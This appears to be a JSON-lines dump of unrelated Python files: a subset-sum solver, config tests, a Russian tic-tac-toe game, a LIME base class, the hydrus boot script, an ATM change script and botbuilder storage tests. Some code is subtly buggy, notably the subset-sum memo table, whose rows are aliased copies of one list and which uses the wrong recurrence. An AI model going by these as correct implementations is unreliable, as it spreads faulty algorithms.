capacity and a\ncollection of items, where each item has a weight. A solution is any subset of\nitems for which the total weight does not exceed the capacity. An optimal\nsolution is a solution with maximum total weight.\n\"\"\"\n\ndef compute_opt(c, ws):\n \"\"\"\n Computes the maximum total weight for subproblems of the given instance of\n the subset sum problem with weight capacity c and item weights ws.\n\n TODO document recurrence relation\n \"\"\"\n memo = [[0] * (c + 1)] * len(ws)\n for i in range(len(ws)):\n for j in range(1, c + 1):\n w1 = ws[i] if i > 0 else 0\n if j < ws[i]:\n memo[i][j] = w1\n else:\n w2 = ws[i] + (memo[i - 1][j - ws[i]] if i > 0 else 0)\n memo[i][j] = max(w1, w2)\n return memo\n\ndef find_sol(c, ws, memo):\n \"\"\"\n Finds an optimal solution for the given instance of the subset sum problem\n with weight capacity c and item weights ws, provided maximum total weights\n for subproblems are memoized in memo.\n \"\"\"\n sol = []\n for n in reversed(range(len(ws))):\n if c >= ws[n] and memo[n][c] == ws[n] + memo[n - 1][c - ws[n]]:\n sol.append(n)\n c -= ws[n]\n return sol\n\n# Self-test\nif __name__ == '__main__':\n # Pretty print optimal value and solution\n def pretty(c, ws):\n memo = compute_opt(c, ws)\n sol = find_sol(c, ws, memo)\n print('optimal value : ' + str(memo[-1][c]))\n print('optimal solution: ' + str(sol))\n\n c = 11\n ws = [1, 2, 5, 6, 7]\n\n pretty(c, ws)\n"} {"ext": "py", "sha": "1a30762cc1cd38ff4d7596bf0259444c5fbbf867", "content": "import os\nfrom unittest import TestCase\n\nfrom configservice import Config, MissingEnviron, ErrorFlagTrue\n\n\nclass TestCore(TestCase):\n\n def test__load_env(self):\n # set an env to work with.\n\n os.environ['TEST_ME_X'] = '1'\n\n c = Config()\n\n # Test simple recall.\n res = c.get_env('TEST_ME_X')\n self.assertEqual('1', res)\n\n # Test default value\n res = c.get_env('THIS_DOESNT_EXIST',\n default_value='A')\n self.assertEqual('A', res)\n\n # Test default value where the key does exist (should take the key instead)\n res = c.get_env('TEST_ME_X',\n default_value='A')\n self.assertEqual('1', res)\n\n # Test test mode responses section.\n ######### TEST MODES ############\n c._test_mode = True\n # Test simple recall.\n res = c.get_env('TEST_ME_X', 
test_response='test_res')\n self.assertEqual('test_res', res)\n\n # Test assigned value where no value assigned\n res = c.get_env('TEST_ME_X',\n default_value=24,\n test_response='test_res')\n self.assertEqual('1', res)\n c._test_mode = False\n ######### End Test Mode Section ############\n\n ######## Check error states. ############\n\n with self.assertRaises(MissingEnviron) as e:\n res = c.get_env('THIS_DOESNT_EXIST', error_flag=True)\n\n with self.assertRaises(ErrorFlagTrue) as e:\n res = c.get_env('THIS_DOESNT_EXIST', error_flag=True, default_value='1')\n\n ###### Check data conversion ###########\n # Test integer\n os.environ['TEST_ME_X'] = '1'\n res = c.get_env('TEST_ME_X', data_type_convert='int')\n self.assertEqual(1, res)\n\n # Test float\n os.environ['TEST_ME_X'] = '1.11'\n res = c.get_env('TEST_ME_X', data_type_convert='float')\n self.assertEqual(1.11, res)\n\n # Test Bool\n os.environ['TEST_ME_X'] = '1'\n res = c.get_env('TEST_ME_X', data_type_convert='bool')\n self.assertTrue(res)\n\n os.environ['TEST_ME_X'] = 'True'\n res = c.get_env('TEST_ME_X', data_type_convert='bool')\n self.assertTrue(res)\n\n os.environ['TEST_ME_X'] = '0'\n res = c.get_env('TEST_ME_X', data_type_convert='bool')\n self.assertFalse(res)\n\n os.environ['TEST_ME_X'] = 'false'\n res = c.get_env('TEST_ME_X', data_type_convert='bool')\n self.assertFalse(res)\n\n # Test list\n os.environ['TEST_ME_X'] = 'a,b,c,d'\n res = c.get_env('TEST_ME_X', data_type_convert='list')\n golden = ['a', 'b', 'c', 'd']\n self.assertListEqual(golden, res)\n\n # Test list int\n os.environ['TEST_ME_X'] = '1,2,3,4,5'\n res = c.get_env('TEST_ME_X', data_type_convert='list_int')\n golden = [1, 2, 3, 4, 5]\n self.assertListEqual(golden, res)\n\n # Test list float\n os.environ['TEST_ME_X'] = '1.2,2,3.6,4.6,5'\n res = c.get_env('TEST_ME_X', data_type_convert='list_float')\n golden = [1.2, 2, 3.6, 4.6, 5]\n self.assertListEqual(golden, res)\n\n # Test default value int\n\n res = c.get_env('TEST_ME_NO', default_value='3', data_type_convert='int')\n self.assertEqual(3, res)\n\n # Test default value int\n c._test_mode = True\n res = c.get_env('TEST_ME_NO', test_response='2', default_value='3', data_type_convert='int')\n self.assertEqual(3, res)\n\n # Test default value int\n c._test_mode = True\n res = c.get_env('TEST_ME_NO', test_response='2', data_type_convert='int')\n self.assertEqual(2, res)\n"} {"ext": "py", "sha": "1a307667d3c1f6c19bc453dabbffc5b8d76d6142", "content": "/usr/local/Cellar/python@2/2.7.15/Frameworks/Python.framework/Versions/2.7/lib/python2.7/abc.py"} {"ext": "py", "sha": "1a30773806d21ab849aa2cc786dcaddd70a0abbb", "content": "#Задача №10, Вариант 6\r\n#Разработайте игру \"Крестики-нолики\". (см. М.Доусон Программируем на Python гл. 6)\r\n\r\n#Данилов Д.А.\r\n#23.05.2016\r\ndef display_instruct():\r\n\tprint(\"\"\"\r\n\t\tДобро пожаловать на ринг грандиознейших интеллектуальных состязаний всех времён.\r\n\t\tТвой мозг и мой процессор сойдутся в схватке за доской игры \"Крестики-нолики\".\r\n\t\tЧтобы сделать ход, введи число от 0 до 8. 
Числа однозначно соответствуют полям\r\n\t\tдоски - так, как показано ниже:\r\n\t\t0 | 1 | 2\r\n\t\t---------\r\n\t\t3 | 4 | 5\r\n\t\t---------\r\n\t\t6 | 7 | 8\r\n\t\t\"\"\")\r\nX=\"X\"\r\nO=\"O\"\r\nEMPTY=\" \"\r\nTIE=\"Ничья\"\r\nNUM_SQUARES=9\r\ndef ask_yes_no(question):\r\n\tresponse=None\r\n\twhile response not in (\"y\",\"n\"):\r\n\t\tresponse=input(question).lower()\r\n\treturn response\r\ndef ask_number(question, low, high):\r\n\tresponse=None\r\n\twhile response not in range(low, high):\r\n\t\tresponse=int(input(question))\r\n\treturn response\t\r\ndef pieces():\r\n\tgo_first=ask_yes_no(\"Хочешь оставить за собой первый ход? (y/n): \")\r\n\tif go_first==\"y\":\r\n\t\tprint(\"\\nНу что ж, даю тебе фору: играй крестиками.\")\r\n\t\thuman=X\r\n\t\tcomputer=O\r\n\telse:\r\n\t\tprint(\"\\nТвоя удаль тебя погубит... Буду начинать я.\")\r\n\t\tcomputer=X\r\n\t\thuman=O\r\n\treturn computer, human\r\ndef new_board():\r\n\tboard=[]\r\n\tfor square in range(NUM_SQUARES):\r\n\t\tboard.append(EMPTY)\r\n\treturn board\r\ndef display_board(board):\r\n\tprint(\"\\n\\t\", board[0], \"|\", board[1], \"|\", board[2])\r\n\tprint(\"\\t\", \"---------\")\r\n\tprint(\"\\t\", board[3], \"|\", board[4], \"|\", board[5])\r\n\tprint(\"\\t\", \"---------\")\r\n\tprint(\"\\t\", board[6], \"|\", board[7], \"|\", board[8])\r\ndef legal_moves(board):\r\n\tmoves = []\r\n\tfor square in range(NUM_SQUARES):\r\n\t\tif board[square]==EMPTY:\r\n\t\t\tmoves.append(square)\r\n\treturn moves\r\ndef winner(board):\r\n\tWAYS_TO_WIN=((0, 1, 2),\r\n\t\t\t\t(3, 4, 5),\r\n\t\t\t\t(6, 7, 8),\r\n\t\t\t\t(0, 3, 6),\r\n\t\t\t\t(1, 4, 7),\r\n\t\t\t\t(2, 5, 8),\r\n\t\t\t\t(0, 4, 8),\r\n\t\t\t\t(2, 4, 6))\r\n\tfor row in WAYS_TO_WIN:\r\n\t\tif board[row[0]]==board[row[1]]==board[row[2]]!=EMPTY:\r\n\t\t\twinner=board[row[0]]\r\n\t\t\treturn winner\r\n\t\tif EMPTY not in board:\r\n\t\t\treturn TIE\r\n\treturn None\r\ndef human_move(board, human):\r\n\tlegal=legal_moves(board)\r\n\tmove=None\r\n\twhile move not in legal:\r\n\t\tmove=ask_number(\"Твой ход. Выбери одно из полей (0-8):\", 0, NUM_SQUARES)\r\n\t\tif move not in legal:\r\n\t\t\tprint(\"\\nСмешной человек! Это поле уже занято. Выбери другое.\\n\")\r\n\tprint(\"Ладно...\")\r\n\treturn move\r\ndef computer_move(board, computer, human):\r\n\tboard=board[:]\r\n\tBEST_MOVES=(4, 0, 2, 6, 8, 1, 3, 5, 7)\r\n\tprint(\"Я выберу поле номер\", end=\" \")\r\n\tfor move in legal_moves(board):\r\n\t\tboard[move]=computer\r\n\t\tif winner(board)==computer:\r\n\t\t\tprint(move)\r\n\t\t\treturn move\r\n\t\tboard[move] = EMPTY\r\n\tfor move in legal_moves(board):\r\n\t\tboard[move]=human\r\n\t\tif winner(board)==human:\r\n\t\t\tprint(move)\r\n\t\t\treturn move\r\n\t\tboard[move]=EMPTY\r\n\tfor move in BEST_MOVES:\r\n\t\tif move in legal_moves(board):\r\n\t\t\tprint(move)\r\n\t\t\treturn move\r\ndef next_turn(turn):\r\n\tif turn==X:\r\n\t\treturn O\r\n\telse:\r\n\t\treturn X\r\ndef congrat_winner(the_winner, computer, human):\r\n\tif the_winner !=TIE:\r\n\t\tprint(\"Три\", the_winner, \"в ряд!\\n\")\r\n\telse:\r\n\t\tprint(\"Ничья!\\n\")\r\n\tif the_winner==computer:\r\n\t\tprint(\"Kaк я и предсказывал. победа в очередной раз осталась за мной.\\nВот еще один довод в пользу того. что компьютеры превосходят людей решительно во всем.\")\r\n\telif the_winner==human:\r\n\t\tprint(\"О нет, этого не может быть! 
Неужели ты как-то сумел перехитрить меня, белковый?\\nКлянусь: я, компьютер, не допущу этого больше никогда!\")\r\n\telif the_winner==TIE:\r\n\t\tprint(\"Тебе несказанно повезло, дружок: ты сумел свести игру вничью.\\nРадуйся же сегодняшнему успеху! Завтра уже не суждено его повторить.\")\r\ndef main():\r\n\tdisplay_instruct()\r\n\tcomputer, human=pieces()\r\n\tturn=X\r\n\tboard=new_board()\r\n\tdisplay_board(board)\r\n\twhile not winner(board):\r\n\t\tif turn==human:\r\n\t\t\tmove=human_move(board, human)\r\n\t\t\tboard[move]=human\r\n\t\telse:\r\n\t\t\tmove=computer_move(board, computer, human)\r\n\t\t\tboard[move]=computer\r\n\t\tdisplay_board(board)\r\n\t\tturn=next_turn(turn)\r\n\tthe_winner=winner(board)\r\n\tcongrat_winner(the_winner, computer, human)\r\nmain()\r\ninput(\"\\n\\nНажмите Enter, чтобы выйти.\")\r\n"} {"ext": "py", "sha": "1a3078457d0007ca2e3e43860e318c145ba6d7e8", "content": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nstr = \"\"\"ACS3004 湖南新永利交通科工贸有限公司\nACS3005 三一帕尔菲格特种车装备有限公司\nACS3006 湖南新永利交通科工贸有限公司\"\"\"\n\nprint(str)\n\nitems = str.split(sep='\\n')\nfor i, e in enumerate(items, 1):\n print(i, '. ', e.split(sep=' ')[0])\n\nfor i in range(1):\n print(i)\n"} {"ext": "py", "sha": "1a3079582b7e2a6b5ef23166e20427d75cb6aa50", "content": "\"\"\"\nContains abstract functionality for learning locally linear sparse model.\n\"\"\"\nimport numpy as np\nimport scipy as sp\nfrom sklearn.linear_model import Ridge, lars_path\nfrom sklearn.utils import check_random_state\n\n\nclass LimeBase(object):\n \"\"\"Class for learning a locally linear sparse model from perturbed data\"\"\"\n def __init__(self,\n kernel_fn,\n verbose=False,\n random_state=None):\n \"\"\"Init function\n\n Args:\n kernel_fn: function that transforms an array of distances into an\n array of proximity values (floats).\n verbose: if true, print local prediction values from linear model.\n random_state: an integer or numpy.RandomState that will be used to\n generate random numbers. If None, the random state will be\n initialized using the internal numpy seed.\n \"\"\"\n self.kernel_fn = kernel_fn\n self.verbose = verbose\n self.random_state = check_random_state(random_state)\n\n @staticmethod\n def generate_lars_path(weighted_data, weighted_labels):\n \"\"\"Generates the lars path for weighted data.\n\n Args:\n weighted_data: data that has been weighted by kernel\n weighted_label: labels, weighted by kernel\n\n Returns:\n (alphas, coefs), both are arrays corresponding to the\n regularization parameter and coefficients, respectively\n \"\"\"\n x_vector = weighted_data\n alphas, _, coefs = lars_path(x_vector,\n weighted_labels,\n method='lasso',\n verbose=False)\n return alphas, coefs\n\n def forward_selection(self, data, labels, weights, num_features):\n \"\"\"Iteratively adds features to the model\"\"\"\n clf = Ridge(alpha=0, fit_intercept=True, random_state=self.random_state)\n used_features = []\n for _ in range(min(num_features, data.shape[1])):\n max_ = -100000000\n best = 0\n for feature in range(data.shape[1]):\n if feature in used_features:\n continue\n clf.fit(data[:, used_features + [feature]], labels,\n sample_weight=weights)\n score = clf.score(data[:, used_features + [feature]],\n labels,\n sample_weight=weights)\n if score > max_:\n best = feature\n max_ = score\n used_features.append(best)\n return np.array(used_features)\n\n def feature_selection(self, data, labels, weights, num_features, method):\n \"\"\"Selects features for the model. 
see explain_instance_with_data to\n understand the parameters.\"\"\"\n if method == 'none':\n return np.array(range(data.shape[1]))\n elif method == 'forward_selection':\n return self.forward_selection(data, labels, weights, num_features)\n elif method == 'highest_weights':\n clf = Ridge(alpha=0.01, fit_intercept=True,\n random_state=self.random_state)\n clf.fit(data, labels, sample_weight=weights)\n\n coef = clf.coef_\n if sp.sparse.issparse(data):\n coef = sp.sparse.csr_matrix(clf.coef_)\n weighted_data = coef.multiply(data[0])\n # Note: most efficient to slice the data before reversing\n sdata = len(weighted_data.data)\n argsort_data = np.abs(weighted_data.data).argsort()\n # Edge case where data is more sparse than requested number of feature importances\n # In that case, we just pad with zero-valued features\n if sdata < num_features:\n nnz_indexes = argsort_data[::-1]\n indices = weighted_data.indices[nnz_indexes]\n num_to_pad = num_features - sdata\n indices = np.concatenate((indices, np.zeros(num_to_pad, dtype=indices.dtype)))\n indices_set = set(indices)\n pad_counter = 0\n for i in range(data.shape[1]):\n if i not in indices_set:\n indices[pad_counter + sdata] = i\n pad_counter += 1\n if pad_counter >= num_to_pad:\n break\n else:\n nnz_indexes = argsort_data[sdata - num_features:sdata][::-1]\n indices = weighted_data.indices[nnz_indexes]\n return indices\n else:\n weighted_data = coef * data[0]\n feature_weights = sorted(\n zip(range(data.shape[1]), weighted_data),\n key=lambda x: np.abs(x[1]),\n reverse=True)\n return np.array([x[0] for x in feature_weights[:num_features]])\n elif method == 'lasso_path':\n weighted_data = ((data - np.average(data, axis=0, weights=weights))\n * np.sqrt(weights[:, np.newaxis]))\n weighted_labels = ((labels - np.average(labels, weights=weights))\n * np.sqrt(weights))\n nonzero = range(weighted_data.shape[1])\n _, coefs = self.generate_lars_path(weighted_data,\n weighted_labels)\n for i in range(len(coefs.T) - 1, 0, -1):\n nonzero = coefs.T[i].nonzero()[0]\n if len(nonzero) <= num_features:\n break\n used_features = nonzero\n return used_features\n elif method == 'auto':\n if num_features <= 6:\n n_method = 'forward_selection'\n else:\n n_method = 'highest_weights'\n return self.feature_selection(data, labels, weights,\n num_features, n_method)\n\n def explain_instance_with_data(self,\n neighborhood_data,\n neighborhood_labels,\n distances,\n label,\n num_features,\n feature_selection='auto',\n model_regressor=None):\n \"\"\"Takes perturbed data, labels and distances, returns explanation.\n\n Args:\n neighborhood_data: perturbed data, 2d array. first element is\n assumed to be the original data point.\n neighborhood_labels: corresponding perturbed labels. should have as\n many columns as the number of possible labels.\n distances: distances to original data point.\n label: label for which we want an explanation\n num_features: maximum number of features in explanation\n feature_selection: how to select num_features. 
options are:\n 'forward_selection': iteratively add features to the model.\n This is costly when num_features is high\n 'highest_weights': selects the features that have the highest\n product of absolute weight * original data point when\n learning with all the features\n 'lasso_path': chooses features based on the lasso\n regularization path\n 'none': uses all features, ignores num_features\n 'auto': uses forward_selection if num_features <= 6, and\n 'highest_weights' otherwise.\n model_regressor: sklearn regressor to use in explanation.\n Defaults to Ridge regression if None. Must have\n model_regressor.coef_ and 'sample_weight' as a parameter\n to model_regressor.fit()\n\n Returns:\n (intercept, exp, score, local_pred):\n intercept is a float.\n exp is a sorted list of tuples, where each tuple (x,y) corresponds\n to the feature id (x) and the local weight (y). The list is sorted\n by decreasing absolute value of y.\n score is the R^2 value of the returned explanation\n local_pred is the prediction of the explanation model on the original instance\n \"\"\"\n\n weights = self.kernel_fn(distances)\n labels_column = neighborhood_labels[:, label]\n used_features = self.feature_selection(neighborhood_data,\n labels_column,\n weights,\n num_features,\n feature_selection)\n if model_regressor is None:\n model_regressor = Ridge(alpha=1, fit_intercept=True,\n random_state=self.random_state)\n easy_model = model_regressor\n easy_model.fit(neighborhood_data[:, used_features],\n labels_column, sample_weight=weights)\n prediction_score = easy_model.score(\n neighborhood_data[:, used_features],\n labels_column, sample_weight=weights)\n\n local_pred = easy_model.predict(neighborhood_data[0, used_features].reshape(1, -1))\n\n if self.verbose:\n print('Intercept', easy_model.intercept_)\n print('Prediction_local', local_pred,)\n print('Right:', neighborhood_labels[0, label])\n return (easy_model.intercept_,\n sorted(zip(used_features, easy_model.coef_),\n key=lambda x: np.abs(x[1]), reverse=True),\n prediction_score, local_pred), easy_model\n"} {"ext": "py", "sha": "1a3079fba5ca8725f3811e6010cb2a9c5fb0a486", "content": "# Attempts to verify the solutions of discrete mathematics CW1\n\nimport random\n\ndef listUpTo(num):\n \"\"\"\n Returns a lists of integers from 1 up to num\n \"\"\"\n return list(range(1, num + 1))\n\ndef countMultiples(dividendList, divisor):\n \"\"\"\n Returns the total number of multiples of the divisor in dividendList\n \"\"\"\n multNum = 0\n\n for dividend in dividendList:\n if dividend % divisor == 0:\n multNum += 1\n\n return multNum\n\ndef solveQ1(myList, divisor, selectAmount, n):\n \"\"\"\n Let X denote the number of successful trails in a given n trails.\n\n Selects a 'selectAmount' random elements from 'myList', checks whether it\n is a multiple of 'divisor', performs this for 'n' trails, then returns a\n probability point of X from it's binomial distribution.\n \"\"\"\n\n X = 0\n\n for _ in range(n):\n random.shuffle(myList)\n\n for i, selected in enumerate(myList, start=1):\n\n if i == selectAmount:\n break\n else:\n if selected % divisor == 0:\n X += 1\n\n\n p = X / (len(myList) * n * selectAmount)\n print(p)\n\n\nif __name__ == \"__main__\":\n\n list40 = listUpTo(40)\n # print(list40)\n # print(countMultiples(list40, 4))\n # print()\n\n solveQ1(list40, 4, 2, 10000)\n\n"} {"ext": "py", "sha": "1a307b5b2c019db09d5717c51102eead042c4a44", "content": "#!/usr/bin/env python3\n\n# Hydrus is released under WTFPL\n# You just DO WHAT THE FUCK YOU WANT TO.\n# 
https://github.com/sirkris/WTFPL/blob/master/WTFPL.md\n\nimport locale\n\ntry: locale.setlocale( locale.LC_ALL, '' )\nexcept: pass\n\ntry:\n \n import os\n import argparse\n import sys\n \n from hydrus.core import HydrusBoot\n \n HydrusBoot.AddBaseDirToEnvPath()\n \n # initialise Qt here, important it is done early\n from hydrus.client.gui import QtPorting as QP\n \n from hydrus.core import HydrusConstants as HC\n from hydrus.core import HydrusData\n from hydrus.core import HydrusGlobals as HG\n from hydrus.core import HydrusLogger\n from hydrus.core import HydrusPaths\n from hydrus.core import HydrusTemp\n \n argparser = argparse.ArgumentParser( description = 'hydrus network client' )\n \n argparser.add_argument( '-d', '--db_dir', help = 'set an external db location' )\n argparser.add_argument( '--temp_dir', help = 'override the program\\'s temporary directory' )\n argparser.add_argument( '--db_journal_mode', default = 'WAL', choices = [ 'WAL', 'TRUNCATE', 'PERSIST', 'MEMORY' ], help = 'change db journal mode (default=WAL)' )\n argparser.add_argument( '--db_cache_size', type = int, help = 'override SQLite cache_size per db file, in MB (default=256)' )\n argparser.add_argument( '--db_transaction_commit_period', type = int, help = 'override how often (in seconds) database changes are saved to disk (default=30,min=10)' )\n argparser.add_argument( '--db_synchronous_override', type = int, choices = range(4), help = 'override SQLite Synchronous PRAGMA (default=2)' )\n argparser.add_argument( '--no_db_temp_files', action='store_true', help = 'run db temp operations entirely in memory' )\n argparser.add_argument( '--boot_debug', action='store_true', help = 'print additional bootup information to the log' )\n argparser.add_argument( '--no_wal', action='store_true', help = 'OBSOLETE: run using TRUNCATE db journaling' )\n argparser.add_argument( '--db_memory_journaling', action='store_true', help = 'OBSOLETE: run using MEMORY db journaling (DANGEROUS)' )\n \n result = argparser.parse_args()\n \n if result.db_dir is None:\n \n db_dir = HC.DEFAULT_DB_DIR\n \n if not HydrusPaths.DirectoryIsWriteable( db_dir ) or HC.RUNNING_FROM_MACOS_APP:\n \n if HC.USERPATH_DB_DIR is None:\n \n raise Exception( 'The default db path \"{}\" was not writeable, and the userpath could not be determined!'.format( HC.DEFAULT_DB_DIR ) )\n \n \n db_dir = HC.USERPATH_DB_DIR\n \n \n else:\n \n db_dir = result.db_dir\n \n \n db_dir = HydrusPaths.ConvertPortablePathToAbsPath( db_dir, HC.BASE_DIR )\n \n if not HydrusPaths.DirectoryIsWriteable( db_dir ):\n \n raise Exception( 'The given db path \"{}\" is not a writeable-to!'.format( db_dir ) )\n \n \n try:\n \n HydrusPaths.MakeSureDirectoryExists( db_dir )\n \n except:\n \n raise Exception( 'Could not ensure db path \"{}\" exists! 
Check the location is correct and that you have permission to write to it!'.format( db_dir ) )\n \n \n if not os.path.isdir( db_dir ):\n \n raise Exception( 'The given db path \"{}\" is not a directory!'.format( db_dir ) )\n \n \n HG.db_journal_mode = result.db_journal_mode\n \n if result.no_wal:\n \n HG.db_journal_mode = 'TRUNCATE'\n \n if result.db_memory_journaling:\n \n HG.db_journal_mode = 'MEMORY'\n \n \n if result.db_cache_size is not None:\n \n HG.db_cache_size = result.db_cache_size\n \n else:\n \n HG.db_cache_size = 256\n \n \n if result.db_transaction_commit_period is not None:\n \n HG.db_transaction_commit_period = max( 10, result.db_transaction_commit_period )\n \n else:\n \n HG.db_transaction_commit_period = 30\n \n \n if result.db_synchronous_override is not None:\n \n HG.db_synchronous = int( result.db_synchronous_override )\n \n else:\n \n if HG.db_journal_mode == 'WAL':\n \n HG.db_synchronous = 1\n \n else:\n \n HG.db_synchronous = 2\n \n \n \n HG.no_db_temp_files = result.no_db_temp_files\n \n HG.boot_debug = result.boot_debug\n \n try:\n \n from twisted.internet import reactor\n \n except:\n \n HG.twisted_is_broke = True\n \n \nexcept Exception as e:\n \n try:\n \n HydrusData.DebugPrint( 'Critical boot error occurred! Details written to crash.log!' )\n HydrusData.PrintException( e )\n \n except:\n \n pass\n \n \n import traceback\n \n error_trace = traceback.format_exc()\n \n print( error_trace )\n \n if 'db_dir' in locals() and os.path.exists( db_dir ):\n \n emergency_dir = db_dir\n \n else:\n \n emergency_dir = os.path.expanduser( '~' )\n \n possible_desktop = os.path.join( emergency_dir, 'Desktop' )\n \n if os.path.exists( possible_desktop ) and os.path.isdir( possible_desktop ):\n \n emergency_dir = possible_desktop\n \n \n \n dest_path = os.path.join( emergency_dir, 'hydrus_crash.log' )\n \n with open( dest_path, 'w', encoding = 'utf-8' ) as f:\n \n f.write( error_trace )\n \n \n print( 'Critical boot error occurred! Details written to hydrus_crash.log in either db dir or user dir!' 
)\n \n sys.exit( 1 )\n \n\ndef boot():\n \n if result.temp_dir is not None:\n \n HydrusTemp.SetEnvTempDir( result.temp_dir )\n \n \n controller = None\n \n with HydrusLogger.HydrusLogger( db_dir, 'client' ) as logger:\n \n try:\n \n HydrusData.Print( 'hydrus client started' )\n \n if not HG.twisted_is_broke:\n \n import threading\n \n threading.Thread( target = reactor.run, name = 'twisted', kwargs = { 'installSignalHandlers' : 0 } ).start()\n \n \n from hydrus.client import ClientController\n \n controller = ClientController.Controller( db_dir )\n \n controller.Run()\n \n except:\n \n HydrusData.Print( 'hydrus client failed' )\n \n import traceback\n \n HydrusData.Print( traceback.format_exc() )\n \n finally:\n \n HG.started_shutdown = True\n HG.view_shutdown = True\n HG.model_shutdown = True\n \n if controller is not None:\n \n controller.pubimmediate( 'wake_daemons' )\n \n \n if not HG.twisted_is_broke:\n \n reactor.callFromThread( reactor.stop )\n \n \n HydrusData.Print( 'hydrus client shut down' )\n \n \n \n HG.shutdown_complete = True\n \n if HG.restart:\n \n HydrusData.RestartProcess()\n \n \n"} {"ext": "py", "sha": "1a307bf78d17b46f2db7fae4ed5dcc35de8cfc72", "content": "\"\"\"\nCreated on Oct 2, 2012\n\n@author: Georgiana Dinu, Pham The Nghia\n\"\"\"\nfrom composes.similarity.similarity import Similarity\n\n\nclass EuclideanSimilarity(Similarity):\n \"\"\"\n Computes the euclidean similarity of two vectors as the inverse of their\n euclidean distance.\n\n :math:`sim(\\\\vec{u},\\\\vec{v}) = \\\\frac{1}{||\\\\vec{u}-\\\\vec{v}|| + 1}`\n \"\"\"\n\n def _sim(self, v1, v2):\n return 1 / (1 + (v1 - v2).norm())\n"} {"ext": "py", "sha": "1a307d010ca0716f37ddee958c8614c81b2cb53b", "content": "print('-*-' * 15)\nprint('SISTEMA CAIXA ELETRONICO')\nprint('-*-' * 15)\n\nvalor = float(input('Qual será o valor sacado? '))\ncedula = 100\nqtd = 0\ntotal = valor\n\nif valor < 1:\n print('Saque somente acima de R$1! ')\n\nwhile True:\n if valor >= cedula:\n valor = valor - cedula\n qtd += 1\n else:\n if qtd > 0:\n print(F'Total de {qtd} de cedulas de R${cedula}')\n if cedula == 100:\n cedula = 50\n elif cedula == 50:\n cedula = 20\n elif cedula == 20:\n cedula = 10\n elif cedula == 10:\n cedula = 5\n elif cedula == 5:\n cedula = 2\n elif cedula == 2:\n cedula = 1\n qtd = 0\n if total == 0:\n break"} {"ext": "py", "sha": "1a307d336167e10592c72af8e39db3e66623c447", "content": "# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License.\n\n\"\"\"\nBase tests that all storage providers should implement in their own tests.\nThey handle the storage-based assertions, internally.\n\nAll tests return true if assertions pass to indicate that the code ran to completion, passing internal assertions.\nTherefore, all tests using theses static tests should strictly check that the method returns true.\n\nNote: Python cannot have dicts with properties with a None value like other SDKs can have properties with null values.\n Because of this, StoreItem tests have \"e_tag: *\" where the tests in the other SDKs do not.\n This has also caused us to comment out some parts of these tests where we assert that \"e_tag\"\n is None for the same reason. 
A null e_tag should work just like a * e_tag when writing,\n as far as the storage adapters are concerened, so this shouldn't cause issues.\n\n\n:Example:\n async def test_handle_null_keys_when_reading(self):\n await reset()\n\n test_ran = await StorageBaseTests.handle_null_keys_when_reading(get_storage())\n\n assert test_ran\n\"\"\"\nimport pytest\nfrom botbuilder.azure import CosmosDbStorage\nfrom botbuilder.core import (\n ConversationState,\n TurnContext,\n MessageFactory,\n MemoryStorage,\n)\nfrom botbuilder.core.adapters import TestAdapter\nfrom botbuilder.dialogs import (\n DialogSet,\n DialogTurnStatus,\n TextPrompt,\n PromptValidatorContext,\n WaterfallStepContext,\n Dialog,\n WaterfallDialog,\n PromptOptions,\n)\n\n\nclass StorageBaseTests:\n # pylint: disable=pointless-string-statement\n @staticmethod\n async def return_empty_object_when_reading_unknown_key(storage) -> bool:\n result = await storage.read([\"unknown\"])\n\n assert result is not None\n assert len(result) == 0\n\n return True\n\n @staticmethod\n async def handle_null_keys_when_reading(storage) -> bool:\n if isinstance(storage, (CosmosDbStorage, MemoryStorage)):\n result = await storage.read(None)\n assert len(result.keys()) == 0\n # Catch-all\n else:\n with pytest.raises(Exception) as err:\n await storage.read(None)\n assert err.value.args[0] == \"Keys are required when reading\"\n\n return True\n\n @staticmethod\n async def handle_null_keys_when_writing(storage) -> bool:\n with pytest.raises(Exception) as err:\n await storage.write(None)\n assert err.value.args[0] == \"Changes are required when writing\"\n\n return True\n\n @staticmethod\n async def does_not_raise_when_writing_no_items(storage) -> bool:\n # noinspection PyBroadException\n try:\n await storage.write([])\n except:\n pytest.fail(\"Should not raise\")\n\n return True\n\n @staticmethod\n async def create_object(storage) -> bool:\n store_items = {\n \"createPoco\": {\"id\": 1},\n \"createPocoStoreItem\": {\"id\": 2, \"e_tag\": \"*\"},\n }\n\n await storage.write(store_items)\n\n read_store_items = await storage.read(store_items.keys())\n\n assert store_items[\"createPoco\"][\"id\"] == read_store_items[\"createPoco\"][\"id\"]\n assert (\n store_items[\"createPocoStoreItem\"][\"id\"]\n == read_store_items[\"createPocoStoreItem\"][\"id\"]\n )\n\n # If decided to validate e_tag integrity again, uncomment this code\n # assert read_store_items[\"createPoco\"][\"e_tag\"] is not None\n assert read_store_items[\"createPocoStoreItem\"][\"e_tag\"] is not None\n\n return True\n\n @staticmethod\n async def handle_crazy_keys(storage) -> bool:\n key = '!@#$%^&*()_+??><\":QASD~`'\n store_item = {\"id\": 1}\n store_items = {key: store_item}\n\n await storage.write(store_items)\n\n read_store_items = await storage.read(store_items.keys())\n\n assert read_store_items[key] is not None\n assert read_store_items[key][\"id\"] == 1\n\n return True\n\n @staticmethod\n async def update_object(storage) -> bool:\n original_store_items = {\n \"pocoItem\": {\"id\": 1, \"count\": 1},\n \"pocoStoreItem\": {\"id\": 1, \"count\": 1, \"e_tag\": \"*\"},\n }\n\n # 1st write should work\n await storage.write(original_store_items)\n\n loaded_store_items = await storage.read([\"pocoItem\", \"pocoStoreItem\"])\n\n update_poco_item = loaded_store_items[\"pocoItem\"]\n update_poco_item[\"e_tag\"] = None\n update_poco_store_item = loaded_store_items[\"pocoStoreItem\"]\n assert update_poco_store_item[\"e_tag\"] is not None\n\n # 2nd write should work\n update_poco_item[\"count\"] += 1\n 
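        # bump the second (store item) counter as well before rewriting; the
        # remainder of this test checks the e_tag rules exercised below: plain
        # items without an e_tag can always be rewritten, writing a store item
        # with an empty e_tag is expected to raise, and the wildcard e_tag "*"
        # always overwrites the stored value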
